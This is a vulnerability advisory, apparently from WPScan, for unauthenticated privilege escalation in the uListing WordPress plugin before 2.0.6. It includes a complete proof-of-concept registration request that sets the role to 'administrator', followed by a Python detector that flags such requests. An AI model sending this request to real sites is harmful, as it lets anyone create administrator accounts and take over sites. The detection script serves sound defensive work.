wpvulndb | M0ze | WPVDB-ID:856B930E-0E76-4CE5-B714-62ABC6017488
History: Jul 27, 2021 - 12:00 a.m.

uListing < 2.0.6 - Unauthenticated Privilege Escalation

2021-07-27 00:00:00
m0ze
wpscan.com
6

EPSS: 0.005 (Low)
Percentile: 75.6%

An Unauthenticated Privilege Escalation vulnerability was discovered in the uListing plugin through v2.0.5 for WordPress. User registration must be allowed on the target website.

PoC

PoC | Unauthenticated Privilege Escalation | Request:

POST /wp-admin/admin-ajax.php?action=stm_listing_register HTTP/2
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/json;charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 205

{"login":"Visse","first_name":"Visse","last_name":"Visse","email":"[email protected]","role":"administrator","password":"admin","password_repeat":"admin","nonce":"ac88e123d8","custom_fields":{}}

PoC | Unauthenticated Privilege Escalation | Response:

{"errors":[],"message":"Registration completed successfully.","status":"success"}
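
A defender-side check for the request shape shown in the PoC, added here as an example and not part of the original advisory or the plugin's code: it flags registration requests whose JSON body carries a client-supplied role. The record layout (`method`, `url`, `body`), the sample records and the allowed-role set are assumptions; adjust the set to the roles your site actually grants at sign-up.

```python
import json
from urllib.parse import urlsplit, parse_qs

# Action name taken from the PoC request on this page.
REGISTER_ACTION = "stm_listing_register"
# Assumption: the only role a self-registering visitor should receive.
ALLOWED_SELF_SERVICE_ROLES = {"subscriber"}


def classify(record):
    """Return (verdict, detail) for one captured HTTP request.

    `record` is a hypothetical dict with 'method', 'url' and 'body' keys,
    e.g. produced by a WAF or reverse proxy that logs request bodies.
    """
    url = urlsplit(record["url"])
    actions = parse_qs(url.query).get("action", [])
    if (record["method"].upper() != "POST"
            or not url.path.endswith("/wp-admin/admin-ajax.php")
            or REGISTER_ACTION not in actions):
        return ("ignore", "not a uListing registration request")
    try:
        body = json.loads(record["body"])
    except (TypeError, ValueError):
        return ("review", "registration body is not valid JSON")
    if not isinstance(body, dict) or "role" not in body:
        return ("ok", "no client-supplied role")
    role = str(body["role"]).strip().lower()
    if role in ALLOWED_SELF_SERVICE_ROLES:
        return ("ok", f"role={role}")
    return ("alert", f"client-supplied role={role}")


# Constructed sample records; values are placeholders, not real traffic.
SAMPLES = [
    {"method": "POST",
     "url": "/wp-admin/admin-ajax.php?action=stm_listing_register",
     "body": '{"login":"u1","email":"u1@example.com","role":"administrator"}'},
    {"method": "POST",
     "url": "/wp-admin/admin-ajax.php?action=stm_listing_register",
     "body": '{"login":"u2","email":"u2@example.com"}'},
    {"method": "POST",
     "url": "/wp-admin/admin-ajax.php?action=heartbeat",
     "body": "interval=60"},
]

if __name__ == "__main__":
    for rec in SAMPLES:
        print(classify(rec))
```

An "alert" verdict on a site still running a version below 2.0.6 is a reason to audit recently created accounts and their roles.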

CPE
Name | Operator | Version
ulisting | lt | 2.0.6